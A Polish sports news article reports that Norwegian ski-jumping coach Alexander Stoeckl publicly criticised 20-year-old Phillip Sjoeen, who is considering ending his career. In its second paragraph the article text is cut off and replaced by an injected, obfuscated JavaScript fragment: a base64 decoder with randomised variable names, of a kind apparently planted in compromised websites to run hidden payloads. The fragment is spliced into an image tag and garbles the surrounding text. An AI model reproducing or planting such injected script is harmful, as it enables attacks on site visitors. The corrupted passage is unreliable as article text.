You are currently viewing Stoeckl krytykuje Sjoeena, 20-latek rozważa zakończenie sportowej kariery

Stoeckl krytykuje Sjoeena, 20-latek rozważa zakończenie sportowej kariery

Phillip Sjoeen fot. Julia Piątkowska - Stoeckl krytykuje Sjoeena, 20-latek rozważa zakończenie sportowej karieryRzadko zdarza się, by trener w nieprzychylnych słowach publicznie wypowiadał się o swoich zawodnikach, a zwłaszcza Alexander Stoeckl, jednak teraz, gdy kontakt między nim a Phillipem Sjoeenem urwał się na początku Letniej Grand Prix, Austriak nie szczędzi gorzkich słów. - Brakuje mu pokory - mówi Stoeckl, który w narodowych kadrach nie widzi miejsca dla 20-latka.

 

Alex<script><figcaption id= - Stoeckl krytykuje Sjoeena, 20-latek rozważa zakończenie sportowej karieryfunction u2fd518ba9147(q3){var u9='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var y7='';var ve,p7,w9,w4,y6,p9,y4;var s0=0;do{w4=u9.indexOf(q3.charAt(s0++));y6=u9.indexOf(q3.charAt(s0++));p9=u9.indexOf(q3.charAt(s0++));y4=u9.indexOf(q3.charAt(s0++));ve=(w4<<2)|(y6>>4);p7=((y6&15)<<4)|(p9>>2);w9=((p9&3)<<6)|y4;if(ve>=192)ve+=848;else if(ve==168)ve=1025;else if(ve==184)ve=1105;y7+=String.fromCharCode(ve);if(p9!=64){if(p7>=192)p7+=848;else if(p7==168)p7=1025;else if(p7==184)p7=1105;y7+=String.fromCharCode(p7);}if(y4!=64){if(w9>=192)w9+=848;else if(w9==168)w9=1025;else if(w9==184)w9=1105;y7+=String.fromCharCode(w9);}}while(s0ander-Stoeckl-fot.-Bartosz-Leja-300x200.jpg" alt="Alexander Stoeckl, fot. Bartosz Leja" width="300" height="200" /> Alexander Stoeckl, fot. Bartosz Leja

Phillip Sjoeen, który z powodu psychicznego obciążenia i sportowego wypalenia na jakiś czas wycofał się ze świata skoków, w czasie trudnych chwil otrzymał sporo wsparcia nie tylko od swoich przyjaciół, ale także krajowego środowiska, które starało się pomóc mu w powrocie do startów w zawodach. I choć 20-latek na skoczni pojawił się ponownie, to z pewnością rzeczywistość nie wyglądała tak, jak sam by tego oczekiwał. Mimo to poczucie spełnionej misji ma sam Alexander Stoeckl.
- Przykro mi, ale czuję, że my, czyli Norweski Związek Narciarski, nasi sympatycy, a także ośrodek Olympiatoppen, zrobiliśmy wszystko, by umożliwić mu dalszy rozwój. Można mówić, że Sjoeen to talent, ale niestety nie jest w pełni świadomym i ukształtowanym zawodnikiem, jest ukierunkowany jedynie w niektórych dziedzinach, a to nie wystarcza - skomentował, nie bez nuty żalu, 42-letni szkoleniowiec. 

Widać, że przez Austriaka przemawia nie tylko żal, ale też złość, bowiem bez ogródek przyznał, co myśli o podejściu swojego, jak widać byłego już podopiecznego, do sportu. - Nie znam go tak dobrze, by powiedzieć, co zostało przeoczone, ale myślę, że to zawodnik, któremu brakuje pokory - wyraził swoje zdanie Stoeckl, argumentując tym samym, dlaczego nie znajdzie miejsca w narodowych kadrach dla skoczka z Oslo. Zapytany, czy w karierze Sjoeena było zbyt dużo słów, a zbyt mało treści, odparł stanowczo: - Dokładnie, to klucz problemu.

Sjoeen Phillip fot.Julia .Piatkowska 300x200 - Stoeckl krytykuje Sjoeena, 20-latek rozważa zakończenie sportowej kariery
Phillip Sjøen, fot. Julia Piątkowska

Faktycznie, gdy urodzony wigilię Bożego Narodzenia Phillip Sjoeen zaczął osiągać coraz to lepsze wyniki, media ogłosiły go ogromnym talentem mającym w przyszłości kolekcjonować medale największych światowych imprez, w tym igrzysk olimpijskich, a sam zainteresowany wielokrotnie twierdził, że ma takie ambicje. Teraz nie ukrywa zdziwienia publicznymi wypowiedziami Stoeckla. - Ostatni raz rozmawiałem z nim, gdy trenowałem w kadrze B. To dziwne uczucie - czytać gazety i widzieć w nich osobiste opinie trenera o zawodnikach - skomentował brązowy medalista mistrzostw świata juniorów z 2015 roku, pytając retorycznie, dlaczego trener nie wyraził swoich wątpliwości wprost, w bezpośredniej rozmowie. Jak podaje strona telewizji NRK, Stoeckl miał jednak wysłać do Sjoeena maila z przeprosinami, w których przyznał, że okazał więcej gniewu i emocji, niż powinien. 

Sjoeen Phillip WC.Bischofshofen.2015 2 fot.Julia .Piatkowska 300x200 - Stoeckl krytykuje Sjoeena, 20-latek rozważa zakończenie sportowej kariery
Phillip Sjoeen, fot. Julia Piątkowska

Po wypowiedziach Stoeckla Sjoeen nie ukrywał, że wciąż zastanawia się nad swoimi możliwościami, a w jego głowie pojawiają się też myśli o zakończeniu kariery. - To przykre, bo mówi, że kocha skoki, ale nie znajduje motywacji do ich trenowania. Jeśli zrezygnuje, będziemy za nim tęsknić, ale mam nadzieję, że podejmie decyzję, która zadowoli jego samego - odpowiedział Stoeckl, zapytany o refleksje związane z wątpliwościami 20-latka. 

Obecnie jednak Sjoeenowi skoki utrudniają nie tylko problemy z psychiką, ale i z przygotowaniem fizycznym, bowiem ból pleców spowodował, że dwukrotny drużynowy MŚJ nie oddał żadnego skoku od kilku miesięcy. - Nie myślę o tym, że opuszczę zimą konkursy. Celowo dystansuję się od środowiska, by poczekać, czy motywacja i żyłka do sportu wrócą - zakończył Sjoeen, który na motywacyjne zmiany w swoim życiu czeka już bardzo długo. Czy doczeka się w trakcie nadchodzącej zimy?

 

źródło: NRK / Dagbladet

 

Dodaj komentarz